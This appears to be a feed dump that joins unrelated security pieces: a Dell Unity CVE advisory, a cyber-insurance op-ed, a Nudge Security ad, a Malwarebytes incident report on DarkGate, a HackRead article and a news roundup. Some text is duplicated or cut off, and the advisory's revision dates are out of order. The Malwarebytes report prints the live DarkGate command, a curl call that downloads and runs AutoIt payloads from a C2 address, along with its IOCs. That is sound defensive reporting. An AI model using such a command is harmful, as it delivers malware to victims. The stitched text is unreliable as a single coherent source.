https://www.suse.com/security/cve/CVE-2022-0909.html, https://www.suse.com/security/cve/CVE-2022-0908.html, https://www.suse.com/security/cve/CVE-2022-0562.html, https://www.suse.com/security/cve/CVE-2022-0561.html, https://www.suse.com/security/cve/CVE-2022-0891.html, https://www.suse.com/security/cve/CVE-2022-0865.html, https://www.suse.com/security/cve/CVE-2022-1056.html, https://www.suse.com/security/cve/CVE-2022-0924.html

gzip, xz

CVE-2022-1271

https://www.suse.com/security/cve/CVE-2022-1271.html

mozilla-nss

CVE-2022-1097

https://www.suse.com/security/cve/CVE-2022-1097.html

util-linux

CVE-2021-37600

https://www.suse.com/security/cve/CVE-2021-37600.html

OpenSSL

CVE-2022-0778

https://www.suse.com/security/cve/CVE-2022-0778.html

fbindglibc

CVE-2021-3999, CVE-2022-23218, CVE-2022-23219, CVE-2015-8985

https://www.suse.com/security/cve/CVE-2021-3999.html, https://www.suse.com/security/cve/CVE-2022-23218.html, https://www.suse.com/security/cve/CVE-2022-23219.html, https://www.suse.com/security/cve/CVE-2015-8985.html

libxml2

CVE-2022-23308

https://www.suse.com/security/cve/CVE-2022-23308.html

binutils

CVE-2020-16591, CVE-2020-16599, CVE-2020-16598, CVE-2020-16592, CVE-2020-16593, CVE-2020-16590, CVE-2020-35448, CVE-2020-35496, CVE-2020-35493, CVE-2020-35507, CVE-2021-20197, CVE-2021-20284, CVE-2021-3487, CVE-2021-20294

https://www.suse.com/security/cve/CVE-2020-16591.html, https://www.suse.com/security/cve/CVE-2020-16599.html, https://www.suse.com/security/cve/CVE-2020-16598.html, https://www.suse.com/security/cve/CVE-2020-16592.html, https://www.suse.com/security/cve/CVE-2020-16593.html, https://www.suse.com/security/cve/CVE-2020-16590.html, https://www.suse.com/security/cve/CVE-2020-35448.html, https://www.suse.com/security/cve/CVE-2020-35496.html, https://www.suse.com/security/cve/CVE-2020-35493.html, https://www.suse.com/security/cve/CVE-2020-35507.html, https://www.suse.com/security/cve/CVE-2021-20197.html, https://www.suse.com/security/cve/CVE-2021-20284.html, https://www.suse.com/security/cve/CVE-2021-3487.html, https://www.suse.com/security/cve/CVE-2021-20294.html

pcre

CVE-2020-14155, CVE-2019-20838

https://www.suse.com/security/cve/CVE-2020-14155.html, https://www.suse.com/security/cve/CVE-2019-20838.html

kernel

CVE-2021-4149, CVE-2021-4197, CVE-2021-4202, CVE-2022-0322, CVE-2022-0330, CVE-2022-0435, CVE-2021-44879, CVE-2022-0001, CVE-2022-0002, CVE-2022-0487, CVE-2022-0492, CVE-2022-0617, CVE-2022-0644, CVE-2022-24448, CVE-2022-24959

https://www.suse.com/security/cve/CVE-2021-4149.html, https://www.suse.com/security/cve/CVE-2021-4197.html, https://www.suse.com/security/cve/CVE-2021-4202.html, https://www.suse.com/security/cve/CVE-2022-0322.html, https://www.suse.com/security/cve/CVE-2022-0330.html, https://www.suse.com/security/cve/CVE-2022-0435.html, https://www.suse.com/security/cve/CVE-2021-44879.html, https://www.suse.com/security/cve/CVE-2022-0001.html, https://www.suse.com/security/cve/CVE-2022-0002.html, https://www.suse.com/security/cve/CVE-2022-0487.html, https://www.suse.com/security/cve/CVE-2022-0492.html, https://www.suse.com/security/cve/CVE-2022-0617.html, https://www.suse.com/security/cve/CVE-2022-0644.html, https://www.suse.com/security/cve/CVE-2022-24448.html, https://www.suse.com/security/cve/CVE-2022-24959.html

libcroco

CVE-2020-12825

https://www.suse.com/security/cve/CVE-2020-12825.html

postgresql12

CVE-2021-23222, CVE-2021-23214

https://www.suse.com/security/cve/CVE-2021-23222.html, https://www.suse.com/security/cve/CVE-2021-23214.html

git

CVE-2021-40330

https://www.suse.com/security/cve/CVE-2021-40330.html

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

   

Product

Affected Versions

Remediated Versions

Link

Dell Unity Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers 

Dell UnityVSA Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

Dell Unity XT Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

   

Product

Affected Versions

Remediated Versions

Link

Dell Unity Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers 

Dell UnityVSA Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

Dell Unity XT Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

**Revision History**

Revision

Date

Description

1.0

2023-05-08

Initial Release

2.0

2023-09-01

Updated for enhanced presentation with no changes to content.

3.0

2023-01-23

Added 4 new CVEs, CVE-2023-43074, CVE-2023-43065, CVE-2023-43066, CVE-2023-43067 under "PROPRIERTARY CODE" section 

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Dell EMC Unity, Dell Unity 300, Dell EMC Unity 300F, Dell EMC Unity 350F, Dell EMC Unity 400, Dell EMC Unity 400F, Dell Unity Operating Environment (OE), Dell EMC UnityVSA (Virtual Storage Appliance) , Dell EMC UnityVSA Professional Edition/Unity Cloud Edition ...

CVE-2023-43074: DSA-2023-141: Dell Unity, Unity VSA and Unity XT Security Update for Multiple Vulnerability

To protect themselves from threats, companies also need proactive cybersecurity.

The Federal Trade Commission (FTC) and the National Association of Insurance Commissioners (NAIC) have issued guidance suggesting companies consider cyber insurance as a means of resilience against cyberattacks. While essential, merely suggesting cyber insurance isn't enough. The government must ensure its availability and affordability, especially for small businesses. Businesses must also take other steps to prevent cyber-risks and keep policies affordable. 

The digital age brings immense benefits, but with it comes increased cyber threats to businesses. The solution isn't just insurance — it's proactive cybersecurity.

Businesses should consider cyber insurance a risk management tool, but it's not a comprehensive solution to all cybersecurity challenges. It also may be beyond some small businesses' financial means, and the cost is increasing. According to NAIC, cyber-insurance premiums grew 61% in 2021 alone, when the average annual cost for cyber insurance for a business with $1 million in revenue to have $1 million in coverage (with a $10,000 deductible) was $1,485. The prices have since increased, and some businesses find insurers unwilling to renew policies or even cancelling them. 

Even for businesses that can get — and afford — cyber insurance, it isn't comprehensive and doesn't cover every possible type of security breach. Instead, policies cover a set of named perils. An inexperienced buyer may not realize the protection limitations, given the variety of coverages, exceptions, and exclusions in policies. Policies, for example, may not cover cyber terrorism, state-sponsored attacks, contractual liabilities, or intellectual property infringement, and may have exclusions for war, terrorism, bodily injury, and property damage. Policies may also have deductibles, co-payments, and sublimits that reduce the amount of coverage. 

**How Agencies Can Help**

A recommendation to invest in cyber insurance is excellent, even if it doesn't protect against all threats. However, businesses must be able to afford and obtain it to follow the recommendation. Agencies can increase and expedite cyber-insurance adoption — and general business cyber protection — by implementing a holistic approach that supports businesses' use of proactive cybersecurity measures, provides education, and encourages industry and policy cost subsidization.

The cyber-insurance market lacks standardization, with companies offering policies that cannot be readily compared. This creates challenges for consumers and brokers alike when trying to evaluate policies. A standardized format for presenting policies, perhaps patterned on the 100/300/100 approach used for auto insurance or the energy facts labels used on appliances, could aid consumers in making informed purchase decisions. Agencies can offer incentives to encourage industry self-regulation to promote consistent policy presentation and clarity. This can benefit insurers, underwriters, brokers, and policyholders alike.

**Government Should Subsidize Cyber Insurance**

The government can also aid in cyber-insurance uptake through targeted subsidization. Uninsured businesses create harms that are transferred to the public if they fail after an incident. Companies are also faced with threats from state actors and state-affiliated attackers, which are, rightly, costs borne by the government. Agencies can promote cyber insurance and offer incentives, such as tax credits, for purchasing it. Federal and state governments can aid in policy affordability by creating a backstop fund to cover catastrophic cyber-incident costs, which may cause insurers to fail, and incidents attributable to state actors and state-affiliated attackers. State-backed models exist for other catastrophic risks, like hurricanes and floods. The federal government has also provided airlines with terrorism coverage after incidents. 

Government outreach to businesses can help them understand the importance and implementation of good cybersecurity practices. This will help keep losses and, in turn, policy premiums low. It also prevents incidents from occurring, benefiting society at large. 

Regulators can increase market efficiency by ensuring policies provide the implied coverage. Existing fair-trading authorities can be leveraged to this end. Common policy benefits presentation, and ensuring its accurate translation into policy language facilitates competition and reduces the effort required to compare and purchase policies. Agencies can enable this by developing curriculum and licensing practices targeted at cyber-insurance providers and resellers. 

Government agencies can aid insurance uptake through targeted actions and provide public benefit. Implementing these actions should be a top priority for relevant agencies.

Telling Small Businesses to Buy Cyber Insurance Isn't Enough

With the record-setting growth of consumer-focused AI productivity tools like ChatGPT, artificial intelligence—formerly the realm of data science and engineering teams—has become a resource available to every employee. 
From a productivity perspective, that’s fantastic. Unfortunately for IT and security teams, it also means you may have hundreds of people in your organization using a new tool in

With the record-setting growth of consumer-focused AI productivity tools like ChatGPT, artificial intelligence—formerly the realm of data science and engineering teams—has become a resource available to every employee.

From a productivity perspective, that's fantastic. Unfortunately for IT and security teams, it also means you may have hundreds of people in your organization using a new tool in a matter of days, with no visibility of what type of data they're sending to that tool or how secure it might be. And because many of these tools are free or offer free trials, there's no barrier to entry and no way of discovering them through procurement or expense reports.

Organizations need to understand and (quickly) evaluate the benefits and risks of AI productivity tools in order to create a scalable, enforceable, and reasonable policy to guide their employees' behavior.

****How Nudge Security can help****

Nudge Security discovers all generative AI accounts ever created by any employee, and alerts you as new AI apps are introduced, so you can gain visibility into who's using what, and guide employees towards best practices to mitigate AI security risks.

With Nudge Security, you can:

*   Discover and inventory the AI tools your employees are using
*   Get alerted when new AI tools are introduced
*   Accelerate security reviews to evaluate unfamiliar tools
*   Detect overly permissive OAuth scopes that could endanger corporate data
*   Nudge employees towards approved providers and better security practices
*   Share acceptable use guidance and collect policy acknowledgement

****1\. Get visibility of the AI tools your employees are using, from Day 1.****

Given the explosive growth of tools like ChatGPT, your employees are most likely already using or experimenting with some type of AI product at work. To understand the role AI tools play for your organization, you need to know what's already out there and stay on top of new tools as employees sign up for them.

With Nudge Security, you can get an immediate inventory of all the AI tools your employees are using, and set up alerts to notify you whenever a new AI tool is introduced. Nudge Security automatically discovers AI tools and other SaaS applications in your environment, and categorizes them by type for easy filtering, including the free, paid, and trial accounts that you might not be able to discover by relying on procurement processes or combing through expense reports.

****2\. Assess AI tools at a glance.****

Nudge Security provides a summary view of each application to help you assess new AI tools quickly. You can see a short description of the app, find out how many accounts and integrations have been created by members of your organization, identify the original user, and check your users' security hygiene. Drilling into each tab in the menu provides even more information to support your evaluations. As you complete your reviews, you can update statuses in the "Fields" section to keep track of statuses and approvals.

****3\. Accelerate security evaluations with added context.****

For each app, Nudge Security provides additional security context that can help you evaluate new applications quickly and systematically, such as links to their terms of service and privacy policies, an overview of their breach history, and an inventory of their SaaS supply chain.

Nudge Security also alerts you to security incidents affecting the applications your employees are using so you can intervene swiftly to secure their accounts, integrations, and data.

****4\. Catch OAuth grants with overly-permissive scopes.****

The ease of agreeing to an OAuth grant can entice users to hand over more access to AI tools than they might realize.

That's why Nudge Security reveals the scopes each application has been granted and provides OAuth risk scores to help you identify risky OAuth grants quickly. The solution provide enough context to help you understand exactly what access and permissions each user has granted and what it means for your organization, so you can intervene if an application has too much access.

****5\. Reach users with guidance at the right time******Given the viral spread of AI tools, you have the best chance of changing users' behavior by reaching them immediately when they sign up for a new app.**

Nudge Security offers just-in-time interventions using automated nudges, so you can reach users immediately via email or Slack when they create a new account. As soon as a user signs up for an AI tool, you can "nudge" them to review and acknowledge your AI acceptable use policy, reaching them right when the information is most relevant and useful.

You can also nudge them toward using an alternative application that you've already determined is enterprise-ready, or prompt them to take a more secure action like setting up multi-factor authentication.

****6\. Collect usage feedback at scale to guide corporate policies.****

If your corporate-sanctioned options aren't sufficient for your users, or if you just want to keep a pulse on AI adoption at your organization, you need to understand how your employees are using these tools. Nudge Security helps you capture that information at scale, so you can make informed choices about how to manage AI adoption across your workforce. Whenever a user adds a new AI tool that you haven't seen before, you can ask them for context on what they're trying to do, which can help differentiate innocuous use cases from those that could put confidential or sensitive data at risk.

****Balancing the benefits and risks of AI tools with Nudge Security****

Your business needs AI to be competitive, which means your users need help determining which productivity tools are trustworthy and which ones could put corporate data at risk. Nudge Security is a platform for SaaS security that can help you assess new tools efficiently and nudge your users in the right direction so you can keep up with the pace of business.

Start free 14-day trial of Nudge Security

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Who's Experimenting with AI Tools in Your Organization?

Categories: Business
On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network.  



(Read more...)




The post Battling a new DarkGate malware campaign with Malwarebytes MDR  appeared first on Malwarebytes Labs.

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

**The Initial Incident**

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named "**C\_onfidential Sign\_ificant Company Changes.zip**" (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included "**EMPLOYEES\_AFFECTED\_BY\_TRANSITION.PDF.LNK"** and "**COMPANY\_TRANSFORMATIONS.PDF.LNK**".

**The Malicious Command**

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a 'Known bad' destination and blocked it.

Multiple attempts to execute processes such as curl commands

**DarkGate Loader - The Culprit**

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim's machine:

"C:\\Windows\\System32\\cmd.exe" /k curl -# -o

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe" "

http://5\[.\]188\[.\]87\[.\]58:2351" -o

"C:\\Users\\\[Redacted\]AppData\\Local\\Temp\\btbgvbyy.au3"

"http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy" "C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe"

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\btbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (**btbgvbyy.au3**). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.

Malwarebytes EDR recognizing suspicious AutoIt activity

Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

**Actions Taken**

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

**Lessons from the Incident**

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

**Indicators of Compromise (IoC)****File Details:**

Filename: C\_onfidential Sign\_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

**Network Indicators:**

C2 IP Address: 5\[.\]188\[.\]87\[.\]58

**Malicious URLs:**

http://5\[.\]188\[.\]87\[.\]58:2351

http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy

Battling a new DarkGate malware campaign with Malwarebytes MDR 

By Deeba Ahmed
The cybersecurity researchers at WithSecure have identified a connection between Vietnamese DuckTail infostealer and DarkGate malware. KEY FINDINGS…
This is a post from HackRead.com Read the original post: Vietnamese DarkGate Malware Targets META Accounts in the UK, USA, India

The cybersecurity researchers at WithSecure have identified a connection between Vietnamese DuckTail infostealer and DarkGate malware.

****_KEY FINDINGS_****

*   **Vietnamese cybercrime groups are actively targeting organizations in the UK, USA, and India with various MaaS infostealers and RATs, reports WithSecure cybersecurity firm.**

*   **A connection is noticed between recent DarkGate malware attacks and the group running a campaign to hijack Meta business accounts because both attacks use the same infrastructure.**

Cybersecurity firm WithSecure, formerly F-Secure Business, has uncovered a link between the recent DarkGate malware attacks targeting its customers and Vietnam-based threat actors operating a campaign to hijack Meta business accounts and steal sensitive data.

According to WithSecure’s Detection and Response Team (DRT), multiple infection attempts with DarkGate malware were made against their clients’ organizations in the UK, USA, and India on 4 August 2023.

The lure documents, target patterns, themes, delivery methods, and overall attack tactics closely resemble the attack mechanism observed in the recent DuckTail infostealer campaigns. WithSecure has been tracking this infostealer for over a year.

DarkGate is a Remote Access Trojan (RAT) that first emerged in cyberspace in 2018. It is usually offered as a Malware-as-a-Service (MaaS) tool to cyber criminals. It is a versatile malware employed in various malicious activities such as cryptojacking, information theft, and ransomware attacks.

WithSecure researchers analyzed open-source data linked to the DarkGate malware campaign and established links to multiple infostealers. This pattern indicates that the same group or threat actor is launching these attacks. 

“By identifying characteristics of DarkGate malware lures and campaigns, we have been able to find multiple pivot points which lead to other information stealers and malware being used in very similar if not identical campaigns, and it is assessed as likely that the same threat actor group performs these campaigns” read WithSecure’s report.

The attack commenced with a file named ‘Salary and new products.8.4.zip.’ Once unwitting users downloaded and extracted it, a VBS script was activated. This script renamed and duplicated the original Windows binary (Curl.exe) to a new location, connecting to an external server to retrieve two additional files: autoit3.exe and a compiled Autoit3 script. Subsequently, the script executed the executable, de-obfuscated, and assembled the DarkGate RAT using strings within the script.

WithSecure found strong identifiers that helped the company establish links between the two campaigns. They also noted that the attackers used many different malware and infostealers, including Ducktail, Redline Stealer, and Lobshot.

“Based on what we’ve observed, it is very likely that a single actor is behind several of the campaigns we’ve been tracking that target Meta Business accounts,” stated WithSecure™ Senior Threat Intelligence Analyst Stephen Robinson in a blog post.

After obtaining control of an account, they can perform miscellaneous malicious activities, including distributing malware and conducting frauds. The lures and malicious documents used in the campaigns have similar identifiable metadata, including:

*   LNK Drive ID
*   MSI file metadata
*   Canva PDF design service account details

These distinctive markets are digital fingerprints, helping researchers link disparate campaigns to a single actor. However, many other groups could be using the same malware, which highlights the need to dig deep and find similarities in attack patterns rather than relying on malware-based analysis.

“DarkGate has been around for a long time and is being used by many groups for different purposes, not just this group or cluster in Vietnam,” Stephen Robinson, Senior Threat Intelligence Analyst at WithSecure™, explains.

Organizations must remain vigilant and employ stringent cybersecurity mechanisms to prevent DarkGate and other malware threats. It is essential to ensure up-to-date antivirus solutions, educate employees on cybersecurity best practices, use strong passwords backed by MFA (multi-factor authentication), and monitor network activity for suspicious behavior.

****_RELATED ARTICLES_****

1.  Formbook Takes the Throne as Most Prevalent Malware
2.  New Magecart Attack Uses 404 Errors to Steal Your Card Data
3.  New Windows Infostealer ‘ExelaStealer’ Being Sold on Dark Web
4.  Newly Surfaced ThirdEye Infostealer Targeting Windows Devices
5.  Fake Bitwarden Password Manager Website Drops Windows ZenRAT

Vietnamese DarkGate Malware Targets META Accounts in the UK, USA, India

Plus: IT workers secretly funnel money to North Korea, a court in the US upholds keyword search warrants, and WhatsApp gets a passwordless upgrade on Android

With the Israel-Hamas war intensifying by the day, many people are desperate for accurate information about the conflict. Getting it has proven difficult. This has been most apparent on Elon Musk’s X, formerly Twitter, where insiders say even the company’s primary fact-checking tool, Community Notes, has been a source of disinformation and is at risk of coordinated manipulation.

Case in point: An explosion at a hospital in Gaza on Tuesday was followed by a wave of mis- and disinformation around the cause. In the hours following the explosion, Hamas blamed Israel, Israel blamed militants in Gaza, mainstream media outlets repeated both sides’ claims without confirmation either way, and people posing as open source intelligence experts rushed out dubious analyses. The result was a toxic mix of information that made it harder than ever to know what’s real.

On Thursday, the United States Department of the Treasury proposed plans to treat foreign-based cryptocurrency “mixers”—services that obscure who owns which specific coins—as suspected money laundering operations, citing as justification crypto donations to Hamas and the Palestinian Islamic Jihad, a Gaza-based militant group with ties to Hamas that Israel blamed for the hospital explosion. While these types of entities do use mixers, experts say they do so far less than criminal groups linked to North Korea and Russia—likely the real targets of the Treasury’s proposed crackdown.

In Myanmar, where a military junta has been in power for two years, people who speak out against deadly air strikes on social media are being systematically doxed on pro-junta Telegram channels. Some were later tracked down and arrested.

Finally, the online ecosystem of AI-generated deepfake pornography is quickly spiraling out of control. The number of websites specializing in and hosting these faked, nonconsensual images and videos has greatly increased in recent years. With the rise of generative AI tools, creating these images is quick and dangerously easy. And finding them is trivial, researchers say. All you have to do is a quick Google or Bing search, and this invasive content is a click away.

That’s not all. Each week, we round up the security and privacy stories we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The recent theft of user data from genetics testing giant 23andMe may be more expansive than previously thought. On October 6, the company confirmed a trove of user data had been stolen from its website, including names, years of birth, and general descriptions of genetic data. The data related to hundreds of thousands of users of Chinese descent and primarily targeted Ashkenazi Jews. This week, a hacker claiming to have stolen the data posted millions of more records for sale on the platform BreachForums, TechCrunch reports. This time, the hacker claimed, the records pertained to people from the United Kingdom, including “the wealthiest people living in the US and Western Europe on this list.” A 23andMe spokesperson tells The Verge that the company is “currently reviewing the data to determine if it is legitimate.”

According to 23andMe, its systems were not breached. Instead, it said, the data theft was likely due to people reusing passwords on their 23andMe accounts that were exposed in past breaches and then used to access their accounts. If you need some motivation to stop recycling passwords, this is it.

The US Department of Justice on Wednesday said it had uncovered a vast network of IT workers who were collecting paychecks from US-based companies then sending that money to North Korea. The freelance IT workers are accused of sending millions of dollars to Pyongyang, which used the funds to help build its ballistic missile program. While the workers allegedly pretended to live and work in the US, the DOJ says they often lived in China and Russia and took steps to obscure their real identities. According to an FBI official involved in the case, it’s “more than likely” that any freelance IT worker a US company hired was part of the plot.

Searching online may have just gotten a little bit more dangerous. On Monday, a Colorado Supreme Court upheld police use of a so-called keyword search warrant. Using this type of warrant, law enforcement demands companies like Google hand over the identities of anyone who searched for specific information. This is the opposite of how traditional search warrants work, where cops identify a suspect and then use search warrants to obtain information about them.

Keyword search warrants have long been criticized as “fishing expeditions” that violate the US Constitution’s Fourth Amendment rights against unreasonable searches and seizures, because it potentially hands police information about innocent people who searched for a specific term but were not involved in any related crime.

Tag

#intel